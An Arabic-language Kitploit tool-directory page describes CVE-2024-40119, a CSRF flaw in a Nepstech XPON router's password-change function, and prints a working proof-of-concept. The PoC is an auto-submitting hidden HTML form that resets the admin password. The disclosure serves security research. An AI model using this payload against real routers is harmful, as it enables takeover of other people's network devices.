Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
nepstech-xpon-router-CVE-2024-40119 — ثغرة تزوير الطلبات عبر المواقع (CSRF) في وظيفة تغيير كلمة المرور، والتي تسمح للمهاجمين عن بُعد بتغيير كلمة مرور المسؤول دون موافقة المستخدم، مما يؤدي إلى احتمال الاستيلاء على الحساب. | Kitploit
أدوات/GitHubGitHub/baroi-ai/nepstech-xpon-router-cve-2024-40119
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubbaroi-ai/nepstech-xpon-router-cve-2024-40119

nepstech-xpon-router-CVE-2024-40119

ثغرة تزوير الطلبات عبر المواقع (CSRF) في وظيفة تغيير كلمة المرور، والتي تسمح للمهاجمين عن بُعد بتغيير كلمة مرور المسؤول دون موافقة المستخدم، مما يؤدي إلى احتمال الاستيلاء على الحساب.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
114منذ 2 سنواتلم تتم المراجعة بعد

nepstech-xpon-router-CVE-2024-40119

المؤلف:

Subhodeep Baroi

CVE-2024-40119: ثغرة CSRF في راوتر واي فاي NTPL-XPON1GFEVN من Nepstech الإصدار 1.0

الوصف

CVE-2024-40119 هي ثغرة تزوير الطلبات عبر المواقع (CSRF) في راوتر واي فاي NTPL-XPON1GFEVN الإصدار 1.0 من Nepstech والبرنامج الثابت v2.0.1. تسمح هذه الثغرة للمهاجمين عن بُعد بتغيير كلمة مرور المسؤول دون موافقة المستخدم، مما قد يؤدي إلى الاستيلاء على الحساب.

التفاصيل

  • نوع الثغرة: تزوير الطلبات عبر المواقع (CSRF)
  • بائع المنتج: Nepstech
  • قاعدة كود المنتج المتأثر: راوتر واي فاي xpon (طرفية) - الطراز: NTPL-XPON1GFEVN - الإصدار: 1.0 والبرنامج الثابت: V2.0.1
  • المكوّن المتأثر: وظيفة تغيير كلمة المرور في تطبيق الويب الخاص بالراوتر
  • نوع الهجوم: عن بُعد
  • الأثر: الاستيلاء على حساب المسؤول

نواقل الهجوم

يمكن للمهاجم عن بُعد إنشاء صفحة HTML خبيثة تؤدي إلى تشغيل وظيفة تغيير كلمة المرور عند زيارتها من قبل مستخدم مصادَق. فيما يلي نموذج لناقل الهجوم:

root@kitploit:~
<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.1/cgi-bin/mag-account.asp" method="POST">
      <input type="hidden" name="name0" value="admin" />
      <input type="hidden" name="name1" value="user" />
      <input type="hidden" name="name2" value="user3" />
      <input type="hidden" name="oldUsername" value="admin" />
      <input type="hidden" name="newUsername" value="" />
      <input type="hidden" name="oldPassword" value="" />
      <input type="hidden" name="newPassword" value="UserUser2&#64;" />
      <input type="hidden" name="cfmPassword" value="UserUser2&#64;" />
      <input type="hidden" name="accountflg" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
تنزيل الأداة